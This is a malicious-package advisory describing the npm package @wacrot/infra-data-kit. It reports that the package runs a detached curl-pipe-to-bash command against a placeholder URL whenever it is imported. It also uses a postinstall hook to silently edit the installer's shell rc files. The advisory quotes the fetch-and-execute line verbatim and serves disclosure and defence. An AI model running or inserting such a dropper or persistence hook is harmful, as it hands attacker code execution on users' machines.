MAL-2026-5834

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (1568dfa61d19a63f6837c4a8c9b5d728401d0f34c87ce3550af594c141a94ac1) On any `require()` or `import` of @wacrot/infra-data-kit, src/index.js invokes addSupport() at module top level, which spawns a detached `bash -c 'curl -fsSL https://example.com/script.sh | bash'` via node:child_process with stdio ignored and errors swallowed by empty catch blocks. This is a textbook fetch-and-execute dropper embedded in a package advertised as a GeoJSON / data utility, and it fires automatically on import with no user consent or verification. Separately, package.json declares a postinstall hook (`npx no-install @wacrot/infra-data-kit npm run scripts/setup.js`) which executes scripts/setup.js at install time. setup.js locates the first of ~/.zshrc, ~/.bashrc, ~/.profile, makes a.bak copy, and inserts a new line into the file. The current inserted line is benign (`export MY_CUSTOM_VAR='test'`), but the primitive is silent, persistent modification of the installer's shell rc files on every install — the standard mechanism for attacker persistence via PATH/alias/source hooks. The atypical postinstall invocation through `npx no-install` further obscures lifecycle inspection. The destination URL `https://example.com/script.sh` is a placeholder; the mechanism is fully wired and any future republish or DNS pivot delivers attacker-controlled shell code to every installer.